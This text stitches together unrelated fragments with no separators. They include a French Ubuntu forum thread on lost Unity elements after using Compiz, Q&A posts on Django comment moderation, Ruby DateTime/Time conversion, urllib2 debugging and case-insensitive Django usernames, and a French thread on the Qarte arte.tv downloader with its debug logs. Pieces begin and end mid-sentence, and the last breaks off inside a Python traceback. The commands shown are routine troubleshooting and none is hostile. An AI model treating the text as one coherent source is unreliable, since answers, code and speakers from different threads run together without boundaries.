saucy-backports/main Translation-fr Ign http://fr.archive.ubuntu.com saucy-backports/multiverse Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy-backports/multiverse Translation-fr Ign http://fr.archive.ubuntu.com saucy-backports/restricted Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy-backports/restricted Translation-fr Ign http://fr.archive.ubuntu.com saucy-backports/universe Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy-backports/universe Translation-fr Lecture des listes de paquets... Fait J'en ai profité pour faire un upgrade, mais il n'y avait aucune maj à faire. Dernière modification par Anarcheon (Le 30/03/2014, à 22:30) Hors ligne nam1962 Re : Perte d'éléments suite à utilisation de compiz Que donne sudo apt-get install --reinstall unity (je t'aurais bien dit d'installer xubuntu-desktop parceque c'est moi, hihihi !) Mon tuto pour optimiser / finaliser une install : http://forum.ubuntu-fr.org/viewtopic.ph … #p15041961 Xubuntu 14.10 sur portable, 14.04 sur fixe, 14.04 chez mes amis. Score : 49 convertis IRL (leur ai pas donné le choix, aussi...). Un jeune site que j'aime bien, qui fait du T-shirt la nouvelle élégance ...bio en plus : http://goudronblanc.com Hors ligne Anarcheon Re : Perte d'éléments suite à utilisation de compiz Je teste ça d'ici une grosse heure J'ai regardé ton tuto et il a l'air super bien, je vais probablement mettre xubuntu pour tester (t'auras probablement droit à un ptit mp à ce moment là ) EDIT : Lecture des listes de paquets... Fait Construction de l'arbre des dépendances Lecture des informations d'état... Fait Les paquets supplémentaires suivants seront installés : compiz Les NOUVEAUX paquets suivants seront installés : compiz unity 0 mis à jour, 2 nouvellement installés, 0 à enlever et 0 non mis à jour. Il est nécessaire de prendre 0 o/1 606 ko dans les archives. Après cette opération, 5 186 ko d'espace disque supplémentaires seront utilisés. Souhaitez-vous continuer [O/n] ? o ATTENTION : les paquets suivants n'ont pas été authentifiés. compiz unity Faut-il installer ces paquets sans vérification (o/N) ? o Sélection du paquet compiz précédemment désélectionné. (Lecture de la base de données... 381912 fichiers et répertoires déjà installés.) Dépaquetage de compiz (à partir de .../compiz_1%3a0.9.10+13.10.20131011-0ubuntu1_all.deb) ... Sélection du paquet unity précédemment désélectionné. Dépaquetage de unity (à partir de .../unity_7.1.2+13.10.20131014.1-0ubuntu1_i386.deb) ... Traitement des actions différées (« triggers ») pour « man-db »... Paramétrage de compiz (1:0.9.10+13.10.20131011-0ubuntu1) ... Paramétrage de unity (7.1.2+13.10.20131014.1-0ubuntu1) ... Dernière modification par Anarcheon (Le 31/03/2014, à 10:37) Hors ligne Anarcheon Re : Perte d'éléments suite à utilisation de compiz Up ? Hors ligne nam1962 Re : Perte d'éléments suite à utilisation de compiz Je ne connais pas Unity en détail, du coup je t'ai suggéré ce qui semble le plus simple et innocent... Tu as encore ceci à tester : sudo rm .Xauthority sudo rm .ICEauthority sudo rm .xsession-errors* sudo reboot Si ca coince toujours et avant d'envisager une fresh install (de xubuntu ? ) tu peux aussi jeter un coup d'oeil là : http://forum.ubuntu-fr.org/viewtopic.ph … #p16476231 Dernière modification par nam1962 (Le 03/04/2014, à 08:54) Mon tuto pour optimiser / finaliser une install : http://forum.ubuntu-fr.org/viewtopic.ph … #p15041961 Xubuntu 14.10 sur portable, 14.04 sur fixe, 14.04 chez mes amis. Score : 49 convertis IRL (leur ai pas donné le choix, aussi...). Un jeune site que j'aime bien, qui fait du T-shirt la nouvelle élégance ...bio en plus : http://goudronblanc.com Hors ligne Anarcheon Re : Perte d'éléments suite à utilisation de compiz Hmm, ça marche toujours pas Le unity --reset de ton lien me renvoie "ERROR: the reset option is now deprecated" Sinon je récupère un liveUSB avec Xubuntu cet aprem, je pense l'installer dans une partition séparée. Je resterai sûrement sur ubuntu quand même, je me suis pas mal habitué à l'environnement. Pour une éventuelle réinstall faudra que je voie comment conserver les différents réglages que j'ai pu faire (dictionnaire et abréviations persos sous LibreOffice, etc...), mais il doit y avoir des fichiers de configs, faudra que je les trouve et conserve juste. Mais la partition /home séparée j'étais pas vraiment convaincu au début, mais là je suis bien content de l'avoir ^^ Et Xubuntu pour faire mumuse, y a moyen que je le garde, ça m'évitera ce genre de déboires et ce sera moins embêtant de formater cette partition là Hors ligne Korak Re : Perte d'éléments suite à utilisation de compiz Bonjour, Dans le retour de la commande: sudo apt-get install --reinstall unity On ne voit pas la fin. On ne sait donc pas si elle a abouti sans erreur. A-t-elle abouti sans erreur? OS: Ubuntu 14.04 64 bits + Windows 8.1 64 bits en dualboot (BIOS UEFI, Secure Boot activé et table de partitions GPT) PC portable HP Pavilion g7-2335sb: Processeur: AMD A4-4300M APU Carte graphique: AMD Radeon HD 7420G Mémoire vive: 6 Go RAM Je suis Parrain-Linux Hors ligne nam1962 Re : Perte d'éléments suite à utilisation de compiz (...)Pour une éventuelle réinstall faudra que je voie comment conserver les différents réglages que j'ai pu faire (dictionnaire et abréviations persos sous LibreOffice, etc...)(...) si tu as un /home séparé tu gardes tous tes réglages (sur Xub il faut installer Libreoffice, c'est tout) Si ta /home n'est pas séparée, pour garder les réglages : http://doc.ubuntu-fr.org/reinstallation_ubuntu Mon tuto pour optimiser / finaliser une install : http://forum.ubuntu-fr.org/viewtopic.ph … #p15041961 Xubuntu 14.10 sur portable, 14.04 sur fixe, 14.04 chez mes amis. Score : 49 convertis IRL (leur ai pas donné le choix, aussi...). Un jeune site que j'aime bien, qui fait du T-shirt la nouvelle élégance ...bio en plus : http://goudronblanc.com Hors ligne Anarcheon Re : Perte d'éléments suite à utilisation de compiz Bonjour Korak, J'ai refait la manip, et j'obtiens bien le même résultat, la ligne suivante est la ligne de commande. A priori pas d'erreur donc. Du coup je vais sûrement repartir sur une réinstallation, en espérant que ça résoudra le problème. Si d'autres ont des idées avant que je ne réinstalle tout ça... Je vous tiens au jus de toute façon. Merci à tous, Anar Hors ligne Anarcheon Re : Perte d'éléments suite à utilisation de compiz Bon alors voici les nouvelles : partitions supplémentaires et installations de Xubuntu et Ubuntu 13.10. Les deux fonctionnent sans soucis et le problème d'affichage est résolu (heureusement !!), par contre pas de connexion internet depuis ces sessions... J'imagine qu'il y a qques manips à faire pour obtenir le wifi...mais histoire de corser un peu la chose, je n'ai pas de connexion filaire disponible (rien dans ma résidence, et de toute manière ma prise Ethernet a cramé lors d'un orage Hors ligne
I am implementing the stock Django comments to an existing site. I'd like comments to appear in multiple apps and models and have all the comments behave the same - i.e. an email sent, plus other bits (listening to 'flag' signals and dealing with accordingly) Where's the best place to put my custom moderator code? I understand that I can pass in an iterator of Models to the register function - at first I placed it inside the __init__.py module of my main app as so: from django.contrib.comments.moderation import moderator, CommentModerator from app.models import Model1 from app2.models import Model2 #.... etc class MyCommentModerator(CommentModerator): email_notification = True enable_field = 'enable_comments' #... moderator.register( [Model1,Model2,Model3,Model4,...], MyCommentModerator ) But this gave an error saying that Model1 was already registered. I would probably re-factor this code into a comments_moderation.py module - but where should I include it? Or is it best practice to register each model inside each apps models.py file? Are there any samples out there that use comments? I only found out how the Comment moderation queue works by trial and error - are there any docs for this that I've missed?
How do you convert between a DateTime and a Time object in Ruby? You'll need two slightly different conversions. To convert from require 'date' class Time def to_datetime # Convert seconds + microseconds into a fractional number of seconds seconds = sec + Rational(usec, 10**6) # Convert a UTC offset measured in minutes to one measured in a # fraction of a day. offset = Rational(utc_offset, 60 * 60 * 24) DateTime.new(year, month, day, hour, min, seconds, offset) end end Similar adjustments to Date will let you convert class Date def to_gm_time to_time(new_offset, :gm) end def to_local_time to_time(new_offset(DateTime.now.offset-offset), :local) end private def to_time(dest, method) #Convert a fraction of a day to a number of microseconds usec = (dest.sec_fraction * 60 * 60 * 24 * (10**6)).to_i Time.send(method, dest.year, dest.month, dest.day, dest.hour, dest.min, dest.sec, usec) end end Note that you have to choose between local time and GM/UTC time. require 'time' require 'date' t = Time.now d = DateTime.now dd = DateTime.parse(t.to_s) tt = Time.parse(d.to_s) As an update to the state of the Ruby ecosystem, pry [1] pry(main)> ts = 'Jan 1, 2000 12:01:01' => "Jan 1, 2000 12:01:01" [2] pry(main)> require 'time' => true [3] pry(main)> require 'date' => true [4] pry(main)> ds = Date.parse(ts) => #<Date: 2000-01-01 (4903089/2,0,2299161)> [5] pry(main)> ds.to_date => #<Date: 2000-01-01 (4903089/2,0,2299161)> [6] pry(main)> ds.to_datetime => #<DateTime: 2000-01-01T00:00:00+00:00 (4903089/2,0,2299161)> [7] pry(main)> ds.to_time => 2000-01-01 00:00:00 -0700 [8] pry(main)> ds.to_time.class => Time [9] pry(main)> ds.to_datetime.class => DateTime [10] pry(main)> ts = Time.parse(ts) => 2000-01-01 12:01:01 -0700 [11] pry(main)> ts.class => Time [12] pry(main)> ts.to_date => #<Date: 2000-01-01 (4903089/2,0,2299161)> [13] pry(main)> ts.to_date.class => Date [14] pry(main)> ts.to_datetime => #<DateTime: 2000-01-01T12:01:01-07:00 (211813513261/86400,-7/24,2299161)> [15] pry(main)> ts.to_datetime.class => DateTime This isn't really that hard. require 'date' date_time = DateTime.now # #<DateTime: blah> date_time.to_time # #<Time: blah> time = Time.now # #<Time: blah> time.to_datetime # #<DateTime: blah> After you Unfortunately, the The conversion methods below do keep that tz info. For Ruby 1.8, look at Gordon Wilson's answer. It's from the good old reliable Ruby Cookbook. For Ruby 1.9, it's slightly easier. require 'date' # Create a date in some foreign time zone (middle of the Atlantic) d = DateTime.new(2010,01,01, 10,00,00, Rational(-2, 24)) puts d # Convert DateTime to Time, keeping the original timezone t = Time.new(d.year, d.month, d.day, d.hour, d.min, d.sec, d.zone) puts t # Convert Time to DateTime, keeping the original timezone d = DateTime.new(t.year, t.month, t.day, t.hour, t.min, t.sec, Rational(t.gmt_offset / 3600, 24)) puts d This prints the following 2010-01-01T10:00:00-02:00 2010-01-01 10:00:00 -0200 2010-01-01T10:00:00-02:00 The full original DateTime info including timezone is kept. Improving on Gordon Wilson solution, here is my try: def to_time #Convert a fraction of a day to a number of microseconds usec = (sec_fraction * 60 * 60 * 24 * (10**6)).to_i t = Time.gm(year, month, day, hour, min, sec, usec) t - offset.abs.div(SECONDS_IN_DAY) end You'll get the same time in UTC, loosing the timezone (unfortunately) Also, if you have ruby 1.9, just try the
I'm making a request using urllib2 and the HTTPBasicAuthHandler like so: import urllib2 theurl = 'http://someurl.com' username = 'username' password = 'password' passman = urllib2.HTTPPasswordMgrWithDefaultRealm() passman.add_password(None, theurl, username, password) authhandler = urllib2.HTTPBasicAuthHandler(passman) opener = urllib2.build_opener(authhandler) urllib2.install_opener(opener) params = "foo=bar" response = urllib2.urlopen('http://someurl.com/somescript.cgi', params) print response.info() I'm currently getting a httplib.BadStatusLine exception when running this code. How could I go about debugging? Is there a way to see what the raw response is regardless of the unrecognized HTTP status code?
bishop Re : Qarte arte.tv browser (ex Qarte+7) VinsS ! J'ai réinstallé Qarte. Avant de lancer Qarte j'ai refait un test avec rtmpdump... pas de problème. J'ai supprimé le dossier caché .qarte puis testé Qarte: bishop@JC:~/Bureau$ qarte -d lang: /usr/share/locale/fr/LC_MESSAGES/qarte.mo 11:44:14: WARNING - utils Config file read error: [Errno 2] Aucun fichier ou dossier de ce type: '/home/bishop/.Qarte/config.cfg' using default. 11:44:14: INFO - qarte Main thread: <_MainThread(MainThread, started 140326371632896)> 11:44:14: INFO - ui_main setup main window 11:44:14: INFO - ui_main set page arte+ 11:44:14: INFO - ui_main set button's group arte+ 11:44:14: INFO - ui_main set basket arte+ 11:44:14: INFO - ui_main set dwnld button arte+ 11:44:14: INFO - ui_main set page arteLive 11:44:14: INFO - ui_main set categories buttons 11:44:14: INFO - ui_main set button's group arteLive 11:44:14: INFO - ui_main set basket arteLive 11:44:14: INFO - ui_main set dwnld buttons 11:44:14: INFO - ui_main set page arteLive extra 11:44:14: INFO - ui_main set extra categories buttons 11:44:14: INFO - ui_main set button's group arteLive extra 11:44:14: INFO - ui_main set basket arteLive extra 11:44:14: INFO - ui_main set extra dwnld buttons 11:44:14: INFO - ui_main set menu bar 11:44:14: INFO - ui_main set status bar 11:44:14: INFO - ui_main set actions 11:44:14: INFO - ui_main make connections 11:44:14: INFO - ui_main set theme 11:44:14: INFO - ui_main main window complete 11:44:14: INFO - utils Updating 11:44:15: INFO - utils File /home/bishop/.Qarte/livedata.py saved 11:44:15: INFO - utils The file has been updated at: mer. 30 janv. 2013 13:07:32 CET 11:44:15: INFO - artePlus arte+7 folder: None 11:44:15: INFO - qarte Call setting dialogbox 11:45:06: INFO - parsers Run arte+7 parser: <Thread(Thread-1, started 140325670610688)> 11:45:06: INFO - parsers Get page: http://videos.arte.tv/fr/videos/ 11:45:06: INFO - parsers Get page: http://videos.arte.tv/fr/do_delegate/videos/index--3188698,view,asThumbnail.html,?hash=fr/thumb///1/200/ 11:45:07: INFO - parsers duration error for Bob: 'NoneType' object has no attribute 'group' 11:45:07: INFO - parsers duration error for Formic: 'NoneType' object has no attribute 'group' 11:45:07: INFO - parsers Found 108 videos 11:45:49: INFO - artePlus Display thumbnails finished Traceback (most recent call last): File "/usr/share/qarte-1.6.0/artePlus.py", line 101, in populate self.display_videos() File "/usr/share/qarte-1.6.0/artePlus.py", line 121, in display_videos self.main.check_parsing() File "/usr/share/qarte-1.6.0/qarte.py", line 269, in check_parsing if self.cfg['load_pages'][2]: IndexError: tuple index out of range 11:46:17: INFO - artePlus get_stream_link: http://videos.arte.tv/fr/videos/bob--7294718 11:46:17: INFO - parsers Get stream URL: http://videos.arte.tv/fr/videos/bob--7294718 11:46:18: INFO - parsers Found: http://videos.arte.tv/fr/do_delegate/videos/bob--7294718,view,asPlayerXml.xml 11:46:18: INFO - parsers Get xml page: http://videos.arte.tv/fr/do_delegate/videos/bob--7294718,view,asPlayerXml.xml 11:46:19: INFO - loader Fetch packets, command: rtmpdump -r "rtmp://artestras.fcod.llnwd.net/a3903/o35/mp4:geo/videothek/ALL/arteprod/A7_SGT_ENC_08_044632-000-A_PG_HQ_FR?h=26680f5634c6487100bc3e43e86eaeab" --flv "/home/bishop/Vidéos/Qarte/plus136014757902.flv" 1360147609.66 File: /home/bishop/Vidéos/Qarte/plus136014757902.flv Renamed: /home/bishop/Vidéos/Qarte/Bob-2013 02 06, 09h25.flv Exit Qarte, Check downloading... OK close updating thread... OK Save config file... OK ...Quiet close. La vidéo Bob-2013 02 06, 09h25.flv est téléchargée et se trouve dans le dossier /home/bishop/Vidéos/Qarte/.Qarte fonctionne ! Que du plaisir ! Merci VinsS pour avoir trouvé la source du problème et pour ce soft vraiment sympa ! Dernière modification par bishop (Le 06/02/2013, à 21:28) Hors ligne fra_tor_33 Re : Qarte arte.tv browser (ex Qarte+7) Désinstallation totale de qarte, y compris dossier de config puis réinstallation = même plantage. Sans doute un problème de thème en effet mais que je n'arrive pas à régler même en remettant les thèmes par défaut. Je laisse malheureusement tomber puisqu'on est dans l'impasse. Je n'ai pas le temps de réinstaller ubuntu maintenant pour voir. J'attendrai la 13.04 Merci pour votre aide malgré tout ;-) Hors ligne gonzolero Re : Qarte arte.tv browser (ex Qarte+7) Très pratique en zone inéligible (1078.495 Kbps (134.812 Ko/sec). Première utilisation aujourd'hui sous ubuntu-12.10 avec Arte+7, pas de problème pour l'instant Ella Ojectif Logo : Logo mis à jour le 25/02/12 Hors ligne freechelmi Re : Qarte arte.tv browser (ex Qarte+7) Petite question : j'ai l'impression que Qarte est limité par le serveur RTMP et donc ne peux pas ripper plus vite que le débit de la vidéo. Alors que des outils comme captivy rippent au max du tuyau ? Hors ligne leTrolldesForets Re : Qarte arte.tv browser (ex Qarte+7) Bonsoir, et merci freechelmi pour ce lien. Malheureusement pour moi même si ce "Logiciel" est "gratuit." Il "Nécessite Microsoft Windows ainsi que Microsoft .NET Framework 4". Or j'utilise Ubuntu Linux et captivy ne semble pas open source, je ne pourrai donc pas étudier comment il rippe au max du tuyau pour en profiter dans Qarte et en faire profiter d'autre utilisateur. Belle pub. Hors ligne HELAMELU Re : Qarte arte.tv browser (ex Qarte+7) Bonjour, je prends ce fil en espérant être au bon endroit. Depuis j'ai essayé de lancé depuis hier à plusieurs reprise Qarte 1.6, que j'utilisais sans problème depuis sa création. Aujourd'hui il ne fonctionne pas, le seul message d'erreur qu'il donne c'est "error downloading". Le seul changement notoire de mon coté, c'est que ma vieille livebox à lâché et que j'ai du en mettre une neuve, d'un modèle + récent à la place. Je ne vois pas bien le rapport éventuel !. D'autre ubunteros auraient ils constaté le même problème? Hors ligne HELAMELU Re : Qarte arte.tv browser (ex Qarte+7) Fausse alerte. à 11h30 du matin Qarte remarche, plein tube (1.4 mo/s). La cde "qarte -d" pour voir ce qui se passe en console c'est super, aussi pour pouvoir choper les messages éventuels. Hors ligne bernic Re : Qarte arte.tv browser (ex Qarte+7) Je pense que fausse alerte n'est pas forcément adaptée J'ai aussi constaté ceci : Le seul message d'erreur qu'il donne c'est "error downloading". J'ai tenté aussi qarte -d sur 2 pc.... même message depuis deux jours : 18:54:31: INFO - parsers Found: http://videos.arte.tv/fr/do_delegate/videos/le-dessous-des-cartes--7362472,view,asPlayerXml.xml 18:54:31: INFO - parsers Get xml page: http://videos.arte.tv/fr/do_delegate/videos/le-dessous-des-cartes--7362472,view,asPlayerXml.xml 18:54:31: INFO - loader Fetch packets, command: rtmpdump -r "rtmp://artestras.fcod.llnwd.net/a3903/o35/mp4:geo/videothek/ALL/arteprod/A7_SGT_ENC_08_047590-018-A_PG_HQ_FR?h=4b6447adfbdea65ac47127782fb8e628" --flv "/home/phil/Vidéos/Arte/plus136293807156.flv" Je voulais récupérer une émission du dessous des cartes... mais rien ne se passe. Je précise qu'auparavant tout fonctionnait nickel...; que je n'ai touché à rien et que je suis encore sous 10.04 Dernière modification par bernic (Le 10/03/2013, à 20:02) La théorie, c'est quand on comprend tout et que rien ne marche. La pratique, c'est quand tout marche mais on ne sait pas pourquoi. Avec win, ils ont réussi les deux : rien ne marche et personne ne sait pourquoi Hors ligne bernic Re : Qarte arte.tv browser (ex Qarte+7) Un truc bizarre que j'ai déjà constaté 2 fois. Voilà ... je lance un enregistrement sur ArteLiveweb... cela fonctionne... j'arrête l'enregistrement et je reviens sur Arte et là .... miracle... je peux enregistrer le dessous des cartes... Etonnant, non ??? Quelle explication sinon : "la pratique, c'est quand tout marche mais on ne sait pas pourquoi". Enfin, c'est mon cas Dernière modification par bernic (Le 10/03/2013, à 20:14) La théorie, c'est quand on comprend tout et que rien ne marche. La pratique, c'est quand tout marche mais on ne sait pas pourquoi. Avec win, ils ont réussi les deux : rien ne marche et personne ne sait pourquoi Hors ligne TerraLibre Re : Qarte arte.tv browser (ex Qarte+7) Salut à tous et grand merci à VinsS! J'ai une suggestion pour la suite: un navigateur de vidéos qu'on a déjà téléchargées avec Qarte, avec recherche par titres, dates, mots-clefs contenu dans les descriptions et pourquoi pas d'autres notes perso (catégories, vu...). Finalement quasiment la même chose mais sur disque dur, parce que je sais pas vous mais moi j'arrive pas à classer ces milliers de docs arte! Générer un fichier texte de description et une image jpg c'est bien mais ça ne s'intègre pas dans un logiciel ni comme un tag vidéo dans le fichier (d'ailleurs le format .flv est une vrai plaie pour ça). J'ai essayé avec Tellico, Griffith, Banshee, vlc, Data Crow... mais aucun ne correspond car soit ça fonctionne avec une base de donnée sauvegardée ou en ligne, soit on entre tout manuellement dans une pauvre colonne commentaire qu'il faut élargir, pas pratique... Donc voilà je fais appel à vous, comment organisez vous vos fichiers Qarte? est-ce qu'une "extension" serait possible ? ou bien un "export" pour autre logiciel de catalogage vidéo? Merci! Hors ligne Swiss_Knight Re : Qarte arte.tv browser (ex Qarte+7) Bonsoir, j'essaye à l'instant ce programme sous Lucid mais il ne veut pas s'installer : il manque une dépendance à un truc qui s'appelle rtmpdump ou un truc du genre, et ce paquet n'est pas trouvable dans la logihtèque. Des idées ? Merci. xuniL Hors ligne VinsS Re : Qarte arte.tv browser (ex Qarte+7) Salut, J'utilise aussi Lucid et rtmpdump se trouve dans Synaptic. Mais peut-être ai-je rajouté un dépôt dont je ne me souviens plus ... Regardes si ce paquet ci convient: Hors ligne tuxmarc Re : Qarte arte.tv browser (ex Qarte+7) Bonjour Donc voilà je fais appel à vous, comment organisez vous vos fichiers Qarte? Je ne me casse pas trop la tête, >vidéos>arte pour les reportages et >vidéos>Téléchat .... pour les petites filles Celà dit, je n'en n'ai pas encore des milliers. Pour Xenius, Arte Reportage, je renomme le fichier pour m'y retrouver. C'est vrai qu'à chaque fois que je vais à la pêche j'en ramène beaucoup et j'ai commencé à graver car au ryhtme où arrivent les mégas, le disque commence à tirer la langue ! Vive Richard Stalmann, Linus Torvalds, et tous les fondus de Linux. De l'Ordinosaure fait à 90% de récup, à un portable LDLC neuf sans système, en passant par une tour, un serveur et une carte mère sans boitier, tous libres !! Collection de 15 DD tous bien élevés au Linux sous la mère et se baladant d'une machine à l'autre. Parrain Linux sur www.parrain-linux.com et www.parrains.linux.free.fr Hors ligne Zoulou.4556 Re : Qarte arte.tv browser (ex Qarte+7) Slt VinsS, slt la communauté j'ai une petite demande sur ta prochaine version, serait il possible d'inclure les vidéos de lesinternets.arte, elles sont sous licences Creative Commons et parle essentiellement d'internet, merci. Asus X66IC Manjaro 64bits dual Ubuntu 14.04 64 bits / Dell Latitude D520 Xubuntu 14.04 32 bits/ Aurore BG6-I3-4-H10S1 SSD 120 go +DD 1To Manjaro 64 bits dual Ubuntu 64 bits Hors ligne TerraLibre Re : Qarte arte.tv browser (ex Qarte+7) Pour Xenius, Arte Reportage, je renomme le fichier pour m'y retrouver. C'est vrai qu'à chaque fois que je vais à la pêche j'en ramène beaucoup et j'ai commencé à graver car au ryhtme où arrivent les mégas, le disque commence à tirer la langue ! Pareil ça s'accumule! Je télécharge tout ce qui bouge (les neurones!) avec Qarte mais je n'ai pas les titres des séries ni les sujets... Pour l'instant je classe par genre: documentaire, film, court métrage, concert... Je prends le résumé en texte et la vignette jpg, je me dis que ça servira pour archiver un jour, avec un bon outil de recherche ! Ce que j'ai trouvé de mieux pour l'instant c'est le gestionnaire de photo DigiKam avec recherche par mots-clefs mais dommage qu'il ne prenne pas en charge les médias offline (CD, disque dur...) comme un catalogueur de fichiers. Si le sujet intéresse d'autres personnes je peux ouvrir un nouveau fil ! Hors ligne Zoulou.4556 Re : Qarte arte.tv browser (ex Qarte+7) Slt, pour ceux que ça intéresse la série de web reportage "Une contre-histoire des internets", Arte diffusera le 14 mai un documentaire sur le même sujet et le même nom "Une contre-histoire de l'Internet", voir l'article ici (Confessions hacker : ma première fois… sur Internet) Asus X66IC Manjaro 64bits dual Ubuntu 14.04 64 bits / Dell Latitude D520 Xubuntu 14.04 32 bits/ Aurore BG6-I3-4-H10S1 SSD 120 go +DD 1To Manjaro 64 bits dual Ubuntu 64 bits Hors ligne VinsS Re : Qarte arte.tv browser (ex Qarte+7) Salut, @ Zoulou.4556, j'ai regardé les liens associés à ces vidéos, ils me semblent, pour la plupart, renvoyer vers Youtube et non pas vers un stream. Arno Martin raconte les années 2000: http://www.youtube.com/embed/YJ2ubCO18q … d_policy=1 Benjamin Bayart: http://www.youtube.com/embed/ciqdTcUdni … d_policy=1 ... Il n'y a rien dans le code de Qarte de prévu pour downloader sur Youtube. Et je ne me vois pas réinventer la roue vu des applis qui téléchargent sur Youtube existent déjà en nombre. Pour trouver le lien Youtube, il suffit de passer avec sa souris sur la date d'une contribution i.e. Le 18 avril 2013 - Par 3615internets et le lien apparaît en bas du navigateur, dans ce cas : lesinternets.arte.tv/contribution/249 ensuite charger la page: wget http://lesinternets.arte.tv/contribution/249 et avec l'outil Chercher, trouver la ligne qui contient le mot youtube Hors ligne Zoulou.4556 Re : Qarte arte.tv browser (ex Qarte+7) Merci d'avoir répondu VinsS, je m'en étais aperçu tardivement mais j'ai laissé le poste au cas ou ça intéresserait d'autres personnes. Asus X66IC Manjaro 64bits dual Ubuntu 14.04 64 bits / Dell Latitude D520 Xubuntu 14.04 32 bits/ Aurore BG6-I3-4-H10S1 SSD 120 go +DD 1To Manjaro 64 bits dual Ubuntu 64 bits Hors ligne Moluskum Re : Qarte arte.tv browser (ex Qarte+7) Bonjour, Je suis sous Ubuntu 12.10, et je ne parviens pas à utiliser Qarte. J'ai installé la version 1.6.0, d'abord en ligne de commande comme décrit dans le 1er post, puis je l'ai désinstallée et j'ai recommencé cette fois en allant chercher le paquet sur Oqapy, mais à chaque fois je rencontre le problème suivant : Qarte se lance bien, la fenêtre de configuration s'affiche, mais dès que j'essaye de cocher un bouton ou quand je clique sur "parcourir" pour sélectionner un dossier les deux fenêtres de Qarte se referment. Impossible de compléter la configuration, le logiciel est inutilisable. Quelqu'un aurait une idée de ce qui cloche ? Merci de votre aide. ---------------------------------------------------------------------------------------------------------------------- EDIT : Je viens de trouver ce qui cloche après être remonté dans les messages précédents : c'est un problème de thème (bug similaire à celui déjà signalé par un utilisateur de Xubuntu). Sous le thème "Adwaita", Qarte plante. Mais en utilisant le thème par défaut "Ambiance" le problème disparaît ! Dernière modification par Moluskum (Le 19/04/2013, à 21:15) Hors ligne Moluskum Re : Qarte arte.tv browser (ex Qarte+7) Une question : comment fait-on pour télécharger des fichiers qui sont bien présents sur le site Arte +7, mais pas proposés par défaut dans l'application, et dont l'url est sur une page .html. J'ai bien trouvé la fonction "recherche personnalisée", et lorsque je rentre une adresse comme, par exemple, http://liveweb.arte.tv/fr/video/Le_Sacr … t_Etienne/, ça fonctionne très bien. Par contre, avec l'adresse suivante : http://videos.arte.tv/fr/videos/real-hu … 47896.html (et toutes celles qui sont localisées sur une page html), Qarte ne trouve pas le flux. Une solution ? --------------------------------------------------------------------- EDIT : Au temps pour moi, sur le deuxième lien la vidéo n'est plus proposée dans son intégralité, il n'y a plus qu'un petit extrait d'à peine une minute, c'est sans doute pour ça qu'il n'est plus proposé dans Qarte. Alors mon exemple tombe à l'eau (mais on ne peut quand même pas accéder au flux, alors que j'y arrive avec Captvity). Tant pis, j'aurais raté les épisodes 3 et 4 Dernière modification par Moluskum (Le 20/04/2013, à 00:20) Hors ligne Moluskum Re : Qarte arte.tv browser (ex Qarte+7) Bon, alors félicitation pour ce soft ! Il est vraiment super, et c'est pour moi la bonne alternative à Captvity (qui m'obligeait encore à retourner épisodiquement sous Windows). Merci ! Hors ligne elrockito87 Re : Qarte arte.tv browser (ex Qarte+7) Salut, depuis plusieurs jours lorsque je lance qarte ce dernier démarre puis plus rien alors je teste en mode console et voici ce que j'obtiens: > qarte lang: /usr/share/locale/fr/LC_MESSAGES/qarte.mo Traceback (most recent call last): File "/usr/bin/qarte", line 118, in <module> Main = Qarte() File "/usr/share/qarte-1.6.0/qarte.py", line 140, in __init__ self.edit_settings() File "/usr/share/qarte-1.6.0/qarte.py", line 228, in edit_settings sett.setupUi(Dialog, self) File "/usr/share/qarte-1.6.0/ui_config.py", line 320, in setupUi self.set_config() File "/usr/share/qarte-1.6.0/ui_config.py", line 336, in set_config self.cfg['cur_cat'])) ValueError: 'News' is not in list Si qq1 a une idée je suis partant........... MERCI N'allez pas là où le chemin peut mener. Allez là où il n'y a pas de chemin et laissez une trace. [Ralph Waldo Emerson] Ne restreins pas le champ du possible aux limites de ton imaginaire. [Antony Bouchardon] Hors ligne alexi Re : Qarte arte.tv browser (ex Qarte+7) Bonsoir! Tout d'abord, un grand merci, installé aujourd'hui sur mon pc et ça fonctionne super bien J'ai juste une petite question J'ai remarqué que les fichiers chargés n'étaient plus en .flv, mais en mp4. Chez moi, c'est enregistré en .flv Est-ce "normal" ? Y-a-t-il un moyen que les vidéos soient enregistrées dans un autre format? Encore merci Sous linux depuis 2 ans :) Tourne sous Ubuntu 14.04 avec KDE Mes pains maison Hors ligne VinsS Re : Qarte arte.tv browser (ex Qarte+7) @ elrockito87 Comment fais-tu pour avoir cela ? la catégorie News à été retirée de la config depuis au moins la version 1.3. Quoiqu'il en soit, dans le dossier ~/.Qarte supprime le fichier config.cfg, tu devras indiquer à nouveau ton dossier de vidéos au prochain démarrage. @ alexi Le format téléchargé est toujours le même, juste une question d'extension. Voir ici: http://forum.ubuntu-fr.org/viewtopic.ph … #p11584921 Hors ligne alexi Re : Qarte arte.tv browser (ex Qarte+7) Merci pour ta réponse VinsS Donc si j'ai bien compris, je peux également changer et mettre une extension .avi ? (encore désolée si ma question est idiote) Sous linux depuis 2 ans :) Tourne sous Ubuntu 14.04 avec KDE Mes pains maison Hors ligne
I need to perform case-insensitive queries on username by defaultwhen using the Django Auth framework. I tried fixing the issue by writing a custom subclass of Querysetand overriding the _filter_or_exclude method and then using thatsubclass in a custom manager for the User model- from django.db.models import Manager from django.db.models.query import QuerySet from django.contrib.auth.models import UserManager class MyQuerySet(QuerySet): def _filter_or_exclude(self, negate, *args, **kwargs): if 'username' in kwargs: kwargs['username__iexact'] = kwargs['username'] del kwargs['username'] return super(MyQuerySet, self)._filter_or_exclude(negate, *args, **kwargs) class MyUserManager(UserManager): def get_query_set(self): return MyQuerySet(self.model) User.objects = MyUserManager() But this approach didn't work and I am getting an weird error when Itry doing User.objects.get(username='Foo'). Any help would be appreciated. Update: I am including the exact error that I am getting. /usr/lib/python2.5/site-packages/django/db/models/query.py in get(self, *args, **kwargs) 295 keyword arguments. 296 """ --> 297 clone = self.filter(*args, **kwargs) 298 num = len(clone) 299 if num == 1: /usr/lib/python2.5/site-packages/django/db/models/query.py in filter(self, *args, **kwargs) 481 set. 482 """ --> 483 return self._filter_or_exclude(False, *args, **kwargs) 484 485 def exclude(self, *args, **kwargs): /home/ghoseb/src/git/ocricket.git/ocricket/user/models.py in _filter_or_exclude(self, negate, *args, **kwargs) 38 kwargs['username__iexact'] = kwargs['username'] 39 del kwargs['username'] ---> 40 return super(MyQuerySet, self)._filter_or_exclude(negate, *args, **kwargs) 41 42 class MyUserManager(UserManager): /usr/lib/python2.5/site-packages/django/db/models/query.py in _filter_or_exclude(self, negate, 